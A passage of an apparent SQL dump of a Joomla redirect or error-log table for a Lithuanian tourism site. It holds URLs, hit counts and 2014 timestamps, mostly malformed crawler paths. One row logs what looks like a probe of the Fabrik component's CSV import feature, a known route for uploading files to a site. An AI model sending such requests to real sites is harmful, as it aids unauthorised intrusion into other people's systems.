00:00:00'),(820,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/projektai/ii-etapas-baznycios-restauravimas','','','',1,0,'2014-09-28 02:03:27','0000-00-00 00:00:00'),(821,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas//','','','',1,0,'2014-09-28 02:11:22','0000-00-00 00:00:00'),(822,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apie-centra/parama//','','','',1,0,'2014-09-28 02:46:59','0000-00-00 00:00:00'),(823,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/kontaktai','','','',1,0,'2014-09-28 02:59:26','0000-00-00 00:00:00'),(824,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apie-centra/darbo-uzmokestis//','','','',1,0,'2014-09-28 03:06:16','0000-00-00 00:00:00'),(825,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/kulinarinis-paveldas//','','','',1,0,'2014-09-28 03:26:45','0000-00-00 00:00:00'),(826,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apgyvendinimas/apgyvendinimas','','','',2,0,'2014-09-28 03:32:41','0000-00-00 00:00:00'),(827,'http://www.infotytuvenai.lt/index.php/index.php/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-28 03:51:40','0000-00-00 00:00:00'),(828,'http://www.infotytuvenai.lt/index.php/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-09-28 04:00:12','0000-00-00 00:00:00'),(829,'http://www.infotytuvenai.lt/index.php/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-28 04:23:57','0000-00-00 00:00:00'),(830,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-28 04:34:40','0000-00-00 00:00:00'),(831,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/../../undefined/','','','',1,0,'2014-09-28 04:42:36','0000-00-00 00:00:00'),(832,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/viesieji-pirkimai','','','',2,0,'2014-09-28 04:55:59','0000-00-00 00:00:00'),(833,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/varniu-regioninis-parkas//','','','',1,0,'2014-09-28 05:02:55','0000-00-00 00:00:00'),(834,'http://www.infotytuvenai.lt/index.php/apie-centra/veiklos-strategija//','','','',1,0,'2014-09-28 05:47:02','0000-00-00 00:00:00'),(835,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/ekskursijos','','','',2,0,'2014-09-28 05:55:22','0000-00-00 00:00:00'),(836,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apie-centra/parama//','','','',1,0,'2014-09-28 05:55:55','0000-00-00 00:00:00'),(837,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija','','','',2,0,'2014-09-28 06:05:11','0000-00-00 00:00:00'),(838,'http://www.infotytuvenai.lt/index.php/index.php/apie-centra/edukacines-programos//','','','',1,0,'2014-09-28 06:19:08','0000-00-00 00:00:00'),(839,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/kulinarinis-paveldas','','','',2,0,'2014-09-28 06:23:22','0000-00-00 00:00:00'),(840,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/projektai/i-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-28 06:24:51','0000-00-00 00:00:00'),(841,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apgyvendinimas/kaimo-turizmas','','','',2,0,'2014-09-28 06:28:41','0000-00-00 00:00:00'),(842,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/apie-centra/viesieji-pirkimai//','','','',1,0,'2014-09-28 06:32:28','0000-00-00 00:00:00'),(843,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/gido-paslaugos//','','','',1,0,'2014-09-28 06:36:18','0000-00-00 00:00:00'),(844,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-09-28 06:40:28','0000-00-00 00:00:00'),(845,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/apie-centra/edukacines-programos//','','','',1,0,'2014-09-28 07:06:39','0000-00-00 00:00:00'),(846,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/istatai','','','',1,0,'2014-09-28 07:26:09','0000-00-00 00:00:00'),(847,'http://www.infotytuvenai.lt/index.php/index.php/apie-centra/galerija//','','','',1,0,'2014-09-28 07:33:23','0000-00-00 00:00:00'),(848,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/lankytini-objektai/muziejai','','','',1,0,'2014-09-28 07:43:24','0000-00-00 00:00:00'),(849,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas//','','','',1,0,'2014-09-28 08:08:14','0000-00-00 00:00:00'),(850,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/projektai','','','',1,0,'2014-09-28 08:20:34','0000-00-00 00:00:00'),(851,'http://www.infotytuvenai.lt/index.php/index.php/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas//','','','',1,0,'2014-09-28 08:39:12','0000-00-00 00:00:00'),(852,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apie-centra/edukacines-programos//','','','',1,0,'2014-09-28 08:41:16','0000-00-00 00:00:00'),(853,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/suvenyrai','','','',1,0,'2014-09-28 08:50:46','0000-00-00 00:00:00'),(854,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-28 09:12:56','0000-00-00 00:00:00'),(855,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra','','','',2,0,'2014-09-28 09:14:53','0000-00-00 00:00:00'),(856,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/suvenyrai','','','',2,0,'2014-09-28 09:19:01','0000-00-00 00:00:00'),(857,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija','','','',1,0,'2014-09-28 09:32:11','0000-00-00 00:00:00'),(858,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',1,0,'2014-09-28 09:34:59','0000-00-00 00:00:00'),(859,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/gido-paslaugos','','','',1,0,'2014-09-28 09:37:19','0000-00-00 00:00:00'),(860,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-28 09:49:55','0000-00-00 00:00:00'),(861,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/tytuvenu-festivalis/galerija','','','',1,0,'2014-09-28 09:51:14','0000-00-00 00:00:00'),(862,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/projektai','','','',1,0,'2014-09-28 10:03:36','0000-00-00 00:00:00'),(863,'http://www.infotytuvenai.lt/index.php/index.php/apie-centra/darbo-uzmokestis//','','','',1,0,'2014-09-28 10:12:14','0000-00-00 00:00:00'),(864,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/projektai','','','',1,0,'2014-09-28 10:14:05','0000-00-00 00:00:00'),(865,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/tytuvenu-regioninis-parkas','','','',1,0,'2014-09-28 10:15:16','0000-00-00 00:00:00'),(866,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/pasiulymai','','','',1,0,'2014-09-28 10:16:44','0000-00-00 00:00:00'),(867,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/lankytini-objektai/kulturos-paveldo-objektai','','','',1,0,'2014-09-28 10:24:12','0000-00-00 00:00:00'),(868,'http://www.infotytuvenai.lt/index.php/index.php/turizmo-informacija/gido-paslaugos//','','','',1,0,'2014-09-28 10:38:02','0000-00-00 00:00:00'),(869,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/tytuvenu-regioninis-parkas','','','',1,0,'2014-09-28 10:47:53','0000-00-00 00:00:00'),(870,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/pasiulymai','','','',1,0,'2014-09-28 10:58:12','0000-00-00 00:00:00'),(871,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/suvenyrai','','','',2,0,'2014-09-28 11:08:18','0000-00-00 00:00:00'),(872,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-09-28 11:11:35','0000-00-00 00:00:00'),(873,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apgyvendinimas/kaimo-turizmas','','','',1,0,'2014-09-28 11:15:00','0000-00-00 00:00:00'),(874,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/suvenyrai','','','',1,0,'2014-09-28 11:15:29','0000-00-00 00:00:00'),(875,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/turizmo-marsrutai','','','',1,0,'2014-09-28 11:22:25','0000-00-00 00:00:00'),(876,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/lankytini-objektai/kulturos-paveldo-objektai//','','','',1,0,'2014-09-28 11:44:27','0000-00-00 00:00:00'),(877,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/tytuvenu-regioninis-parkas','','','',2,0,'2014-09-28 11:47:50','0000-00-00 00:00:00'),(878,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos','','','',1,0,'2014-09-28 12:11:39','0000-00-00 00:00:00'),(879,'http://www.infotytuvenai.lt/index.php/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-09-28 12:13:19','0000-00-00 00:00:00'),(880,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/aktyvus-poilsis','','','',2,0,'2014-09-28 12:15:42','0000-00-00 00:00:00'),(881,'http://www.infotytuvenai.lt/index.php/apie-centra/darbo-uzmokestis//','','','',1,0,'2014-09-28 12:18:17','0000-00-00 00:00:00'),(882,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/galerija//','','','',1,0,'2014-09-28 12:43:45','0000-00-00 00:00:00'),(883,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/apie-centra/paslaugos//','','','',1,0,'2014-09-28 12:49:26','0000-00-00 00:00:00'),(884,'http://www.infotytuvenai.lt/index.php/index.php/index.php/turizmo-informacija/tytuvenu-regioninis-parkas//','','','',1,0,'2014-09-28 12:52:17','0000-00-00 00:00:00'),(885,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-28 12:54:58','0000-00-00 00:00:00'),(886,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/maitinimas','','','',2,0,'2014-09-28 13:05:21','0000-00-00 00:00:00'),(887,'http://www.infotytuvenai.lt/index.php/index.php/lankytini-objektai/kulturos-paveldo-objektai//','','','',1,0,'2014-09-28 13:19:34','0000-00-00 00:00:00'),(888,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/apie-centra/darbo-uzmokestis//','','','',1,0,'2014-09-28 13:27:51','0000-00-00 00:00:00'),(889,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/dubysos-regioninis-parkas','','','',2,0,'2014-09-28 13:40:35','0000-00-00 00:00:00'),(890,'http://www.infotytuvenai.lt/index.php/index.php/index.php/turizmo-informacija/varniu-regioninis-parkas//','','','',1,0,'2014-09-28 13:54:24','0000-00-00 00:00:00'),(891,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/galerija','','','',1,0,'2014-09-28 13:57:08','0000-00-00 00:00:00'),(892,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija','','','',1,0,'2014-09-28 14:02:11','0000-00-00 00:00:00'),(893,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/suvenyrai//','','','',1,0,'2014-09-28 14:03:36','0000-00-00 00:00:00'),(894,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apgyvendinimas/apgyvendinimas','','','',1,0,'2014-09-28 14:08:12','0000-00-00 00:00:00'),(895,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/lankytini-objektai/kulturos-paveldo-objektai','','','',1,0,'2014-09-28 14:21:43','0000-00-00 00:00:00'),(896,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apie-centra/viesieji-pirkimai//','','','',1,0,'2014-09-28 14:54:45','0000-00-00 00:00:00'),(897,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/apie-centra/galerija//','','','',1,0,'2014-09-28 14:57:41','0000-00-00 00:00:00'),(898,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apie-centra/veiklos-strategija//','','','',1,0,'2014-09-28 15:01:47','0000-00-00 00:00:00'),(899,'http://www.infotytuvenai.lt/index.php/apie-centra/edukacines-programos//','','','',1,0,'2014-09-28 15:04:06','0000-00-00 00:00:00'),(900,'http://tytuvenai.eu/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',5,0,'2014-09-28 15:23:00','0000-00-00 00:00:00'),(901,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/paslaugos','','','',1,0,'2014-09-28 15:25:18','0000-00-00 00:00:00'),(902,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',1,0,'2014-09-28 15:33:21','0000-00-00 00:00:00'),(903,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/turizmo-informacija/varniu-regioninis-parkas//','','','',1,0,'2014-09-28 16:13:02','0000-00-00 00:00:00'),(904,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/veiklos-strategija','','','',1,0,'2014-09-28 16:17:41','0000-00-00 00:00:00'),(905,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/tytuvenu-festivalis/programos','','','',1,0,'2014-09-28 16:25:37','0000-00-00 00:00:00'),(906,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-28 16:27:06','0000-00-00 00:00:00'),(907,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/viesieji-pirkimai','','','',1,0,'2014-09-28 16:33:39','0000-00-00 00:00:00'),(908,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/turizmo-informacija/kulinarinis-paveldas//','','','',1,0,'2014-09-28 16:34:30','0000-00-00 00:00:00'),(909,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/veiklos-strategija','','','',1,0,'2014-09-28 16:37:28','0000-00-00 00:00:00'),(910,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/turizmo-informacija/suvenyrai//','','','',1,0,'2014-09-28 16:44:04','0000-00-00 00:00:00'),(911,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/13-sample-data-article/demo/features/31-renginiai','','','',1,0,'2014-09-28 16:54:16','0000-00-00 00:00:00'),(912,'http://www.infotytuvenai.lt/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-28 16:57:02','0000-00-00 00:00:00'),(913,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/varniu-regioninis-parkas','','','',1,0,'2014-09-28 17:14:51','0000-00-00 00:00:00'),(914,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/tytuvenu-festivalis/programos//','','','',1,0,'2014-09-28 17:43:24','0000-00-00 00:00:00'),(915,'http://www.infotytuvenai.lt/index.php/index.php/projektai/i-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-28 17:50:32','0000-00-00 00:00:00'),(916,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/tytuvenu-regioninis-parkas//','','','',1,0,'2014-09-28 17:53:40','0000-00-00 00:00:00'),(917,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija/dubysos-regioninis-parkas','','','',1,0,'2014-09-28 18:24:47','0000-00-00 00:00:00'),(918,'http://www.infotytuvenai.lt/index.php/index.php/apie-centra/veiklos-strategija//','','','',1,0,'2014-09-28 18:46:07','0000-00-00 00:00:00'),(919,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/ekskursijos','','','',1,0,'2014-09-28 18:48:35','0000-00-00 00:00:00'),(920,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/projektai/ii-etapas-baznycios-restauravimas','','','',1,0,'2014-09-28 18:49:57','0000-00-00 00:00:00'),(921,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/tytuvenu-festivalis/galerija//','','','',1,0,'2014-09-28 18:51:51','0000-00-00 00:00:00'),(922,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/gido-paslaugos','','','',1,0,'2014-09-28 19:02:15','0000-00-00 00:00:00'),(923,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/darbo-uzmokestis','','','',1,0,'2014-09-28 19:12:58','0000-00-00 00:00:00'),(924,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/ekskursijos','','','',1,0,'2014-09-28 19:24:38','0000-00-00 00:00:00'),(925,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/parama','','','',1,0,'2014-09-28 19:33:30','0000-00-00 00:00:00'),(926,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/lankytini-objektai/muziejai','','','',1,0,'2014-09-28 19:39:43','0000-00-00 00:00:00'),(927,'http://www.infotytuvenai.lt/index.php/index.php/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-09-28 19:56:07','0000-00-00 00:00:00'),(928,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/kulinarinis-paveldas','','','',1,0,'2014-09-28 20:05:45','0000-00-00 00:00:00'),(929,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',1,0,'2014-09-28 20:25:59','0000-00-00 00:00:00'),(930,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/istatai','','','',1,0,'2014-09-28 20:26:11','0000-00-00 00:00:00'),(931,'http://www.infotytuvenai.lt/index.php/index.php/lankytini-objektai/muziejai//','','','',1,0,'2014-09-28 20:38:46','0000-00-00 00:00:00'),(932,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra','','','',1,0,'2014-09-28 20:46:53','0000-00-00 00:00:00'),(933,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/turizmo-informacija/gido-paslaugos//','','','',1,0,'2014-09-28 20:55:42','0000-00-00 00:00:00'),(934,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/turizmo-marsrutai','','','',1,0,'2014-09-28 21:05:20','0000-00-00 00:00:00'),(935,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/tytuvenu-festivalis/programos//','','','',1,0,'2014-09-28 21:45:50','0000-00-00 00:00:00'),(936,'http://www.infotytuvenai.lt/index.php/index.php/index.php/lankytini-objektai/kulturos-paveldo-objektai//','','','',1,0,'2014-09-28 21:50:44','0000-00-00 00:00:00'),(937,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/edukacines-programos','','','',1,0,'2014-09-28 22:07:44','0000-00-00 00:00:00'),(938,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/galerija','','','',1,0,'2014-09-28 22:16:23','0000-00-00 00:00:00'),(939,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/edukacines-programos','','','',1,0,'2014-09-28 22:23:52','0000-00-00 00:00:00'),(940,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/suvenyrai','','','',1,0,'2014-09-28 22:44:54','0000-00-00 00:00:00'),(941,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/darbo-uzmokestis','','','',1,0,'2014-09-28 22:49:09','0000-00-00 00:00:00'),(942,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija','','','',1,0,'2014-09-28 22:52:13','0000-00-00 00:00:00'),(943,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/maitinimas','','','',1,0,'2014-09-28 22:57:55','0000-00-00 00:00:00'),(944,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/maitinimas','','','',1,0,'2014-09-28 23:06:08','0000-00-00 00:00:00'),(945,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/turizmo-informacija/gido-paslaugos//','','','',1,0,'2014-09-28 23:12:10','0000-00-00 00:00:00'),(946,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/projektai/ii-etapas-baznycios-restauravimas','','','',1,0,'2014-09-28 23:19:33','0000-00-00 00:00:00'),(947,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-28 23:35:24','0000-00-00 00:00:00'),(948,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/aktyvus-poilsis','','','',1,0,'2014-09-28 23:41:04','0000-00-00 00:00:00'),(949,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/viesieji-pirkimai','','','',1,0,'2014-09-28 23:47:22','0000-00-00 00:00:00'),(950,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/lankytini-objektai/muziejai','','','',1,0,'2014-09-28 23:48:04','0000-00-00 00:00:00'),(951,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/edukacines-programos','','','',1,0,'2014-09-28 23:58:59','0000-00-00 00:00:00'),(952,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/tytuvenu-festivalis/naujienos','','','',1,0,'2014-09-29 00:16:36','0000-00-00 00:00:00'),(953,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/tytuvenu-festivalis/kontaktai','','','',1,0,'2014-09-29 00:50:37','0000-00-00 00:00:00'),(954,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apgyvendinimas/apgyvendinimas','','','',1,0,'2014-09-29 01:10:39','0000-00-00 00:00:00'),(955,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/gido-paslaugos//','','','',1,0,'2014-09-29 01:28:18','0000-00-00 00:00:00'),(956,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apgyvendinimas/kaimo-turizmas','','','',1,0,'2014-09-29 01:31:52','0000-00-00 00:00:00'),(957,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/tytuvenu-festivalis/naujienos//','','','',1,0,'2014-09-29 01:53:57','0000-00-00 00:00:00'),(958,'http://www.infotytuvenai.lt/index.php/index.php/index.php/turizmo-informacija/turizmo-marsrutai//','','','',1,0,'2014-09-29 02:01:53','0000-00-00 00:00:00'),(959,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija/gido-paslaugos','','','',1,0,'2014-09-29 02:11:21','0000-00-00 00:00:00'),(960,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/pasiulymai','','','',1,0,'2014-09-29 02:21:08','0000-00-00 00:00:00'),(961,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apgyvendinimas','','','',1,0,'2014-09-29 02:27:13','0000-00-00 00:00:00'),(962,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-29 02:54:24','0000-00-00 00:00:00'),(963,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features//','','','',1,0,'2014-09-29 02:58:58','0000-00-00 00:00:00'),(964,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/lankytini-objektai/kulturos-paveldo-objektai//','','','',1,0,'2014-09-29 03:07:00','0000-00-00 00:00:00'),(965,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apie-centra/ekskursijos//','','','',1,0,'2014-09-29 03:09:42','0000-00-00 00:00:00'),(966,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/dubysos-regioninis-parkas','','','',1,0,'2014-09-29 03:12:45','0000-00-00 00:00:00'),(967,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/turizmo-marsrutai//','','','',1,0,'2014-09-29 03:14:34','0000-00-00 00:00:00'),(968,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/programos','','','',1,0,'2014-09-29 03:16:16','0000-00-00 00:00:00'),(969,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/varniu-regioninis-parkas','','','',1,0,'2014-09-29 03:19:15','0000-00-00 00:00:00'),(970,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features//','','','',1,0,'2014-09-29 03:27:34','0000-00-00 00:00:00'),(971,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/naujienos//','','','',1,0,'2014-09-29 03:30:31','0000-00-00 00:00:00'),(972,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/apie-centra/parama//','','','',1,0,'2014-09-29 03:38:31','0000-00-00 00:00:00'),(973,'http://www.infotytuvenai.lt/index.php/apie-centra/viesieji-pirkimai//','','','',1,0,'2014-09-29 04:11:17','0000-00-00 00:00:00'),(974,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/projektai/ii-etapas-baznycios-restauravimas','','','',1,0,'2014-09-29 04:28:10','0000-00-00 00:00:00'),(975,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apie-centra/paslaugos//','','','',1,0,'2014-09-29 05:15:18','0000-00-00 00:00:00'),(976,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/parama','','','',1,0,'2014-09-29 05:21:01','0000-00-00 00:00:00'),(977,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/tytuvenu-festivalis/naujienos','','','',1,0,'2014-09-29 05:23:14','0000-00-00 00:00:00'),(978,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/viesieji-pirkimai','','','',1,0,'2014-09-29 05:25:42','0000-00-00 00:00:00'),(979,'http://www.infotytuvenai.lt/index.php/projektai/i-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-29 05:56:05','0000-00-00 00:00:00'),(980,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/dubysos-regioninis-parkas','','','',1,0,'2014-09-29 06:06:39','0000-00-00 00:00:00'),(981,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/projektai/i-etapas-baznycios-restauravimas','','','',1,0,'2014-09-29 06:12:29','0000-00-00 00:00:00'),(982,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/darbo-uzmokestis','','','',1,0,'2014-09-29 06:24:31','0000-00-00 00:00:00'),(983,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/projektai/i-etapas-baznycios-restauravimas','','','',1,0,'2014-09-29 06:42:56','0000-00-00 00:00:00'),(984,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/projektai','','','',1,0,'2014-09-29 06:50:17','0000-00-00 